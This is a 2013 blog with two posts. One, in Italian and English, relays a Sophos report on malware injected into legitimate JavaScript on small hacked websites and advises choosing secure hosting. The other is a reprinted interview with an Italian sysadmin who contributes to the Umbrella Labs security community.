lunedì 18 febbraio 2013

Malware injected into legitimate JavaScript code on legitimate websites

Questo post analizza la situazione della diffusione dei malware su internet soffermandosi sulla situazione italiana:
As recently mentioned in the Sophos Security Threat Report, 80% of the websites where we detect malicious content are innocent sites that have been hacked.
A trend that we have observed is that hackers will insert their malicious code into legitimate JavaScript (not to be mixed up with Java!) hosted on the website.
The JavaScript is automatically loaded by the HTML webpages and inherits the reputation of the main site and the legitimate JavaScript.
In other words, if a user's anti-virus software did display an alert about malicious content, it might be shrugged off as a false positive and blamed on an unreliable detection of a legitimate piece of JavaScript code.
Recently SophosLabs has seen a flurry of detections of Troj/Iframe-JG on legitimate websites, including:
  • Primary School websites in England
  • Small community websites in Italy
  • A nightclub website in London
  • The website of an East African nation's TV company
  • The website of trade association of Financial Advisors in the US
Infatti quello che osservo moderando la community OpenDNS è che quasi mai vengono presi di mira domini di grandi aziende ma quasi sempre siti internet di piccole realtà, spesso non monitorati, sviluppati con cms open-source non aggiornati.
Mi riferisco a piccole realtà commerciali, piccoli comuni, parrocchie, associazioni giovanili, studi professionali.
Dubito che in questi casi i proprietari del sito siano consapevoli di quello che succede sul loro dominio. Resta che il danno di immagine è tangibile ed una volta entrati nelle black-list è molto difficile uscirne. 
Quello che sento di consigliare a chi sta valutando di aprire una vetrina su internet è di affidarsi a persone che sono in grado di sviluppare il sito e che siano in grado di assicurarne la piena sicurezza che sintetizzando è lo stesso che propone alla fine del post @SophosLabs:
"One of the key things that anyone - whether as an individual or working on behalf of a company - needs to consider when setting up a website, is how to choose a good hosting provider from the security point-of-view.

domenica 10 febbraio 2013

Meet Francesco, a Member of the Umbrella Labs Security Community

Meet Francesco, a Member of the Umbrella Labs Security Community:
We’re searching for smart, passionate Internet security experts to join the Umbrella Labs Security Community. Members of the Umbrella Labs Security Community are on the front lines of Internet security, as they’re able to submit malicious and potentially malicious domains for community review and discussion. The community is made up of security researchers, IT technicians and software engineers from all around the globe who hold a strong dedication for keeping the Internet safe and secure.  For more information about how the whole process works, click here.
But rather than brag about how awesome the Umbrella Labs Security Community is, I thought I’d let a member of the community share his thoughts. Francesco, who lives in Italy, is one of the top contributors to the community.
Vinny: Tell us a bit about yourself
Francesco: I work as sysadmin (linux + wmware) for a big Italian IT company and I live near Palermo. You can find me on Twitter @mrbyte72, where I share about my personal interests, but not my work.
Vinny: What initially sparked your interest in internet security?
Francesco: My work revolves around Internet security questions, including Squid traffic log reporting analysis, Apache Web server security, Java vulnerability, patching operating systems, etc.  I am convinced that anti-virus products alone are no longer sufficient to ensure a reasonable level of security.
Vinny: What is the best or most convincing scam that you’ve ever seen or heard about?
Francesco: Every morning I receive mail with incredible messages, but the most memorable attack I know of was Blaster, a blended threat that was discovered in 2003.
Vinny: Besides OpenDNS what are you favorite tools of your trade to use?
Francesco:  I work as Linux/VMware SysAdmin, so I have many:
  • SO: CentOS/Red-Hat – Ubuntu server ; 
  • Database: Oracle – mysql – postgresql ;
  • Appliaction server:  tomcat – Jboss – Orion – OC4J;
  • web server: Apache – IIS  - awstats;
  • Proxy: Squid + Dansguardian – calamaris;
  • Cluster : red-hat cluster – heartbeat;
  • Vmware: ESX  ESXi vsphere;
  • Management: OpenNMS
Vinny: Certification is a big for security professionals. What credentials have you earned? 
Francesco:  I’m certified in Vmware VCP4 and ITIL v3 Foundation + Service Operation.
Vinny:  What do you most enjoy about being a moderator?
Francesco:  I’m a long time OpenDNS user, and I know my contributions help to make the Internet at large safer.  
Vinny:  What’s your most memorable contribution to the Umbrella Labs Security Community?
Francesco: The greatest thing about the Umbrella Security Labs method is that it combines the community with machine learning. Humans possess geographical and cultural knowledge that sometimes you just can’t teach a machine. For example, I discovered that was tagged as malware. A know that this is one of the most-used Italian pre-paid credit cards, so I quickly alerted the Umbrella team that it was incorrectly tagged. 
Vinny: Would you rather never have to sleep or never have to breathe?
Francesco: I love sleep, so I couldn’t give it up!
If you’re interested in joining Francesco and the Umbrella Labs Security Community, just apply online and let us know why you’d make a great contributor to the community.
The post Meet Francesco, a Member of the Umbrella Labs Security Community appeared first on Umbrella Security Labs.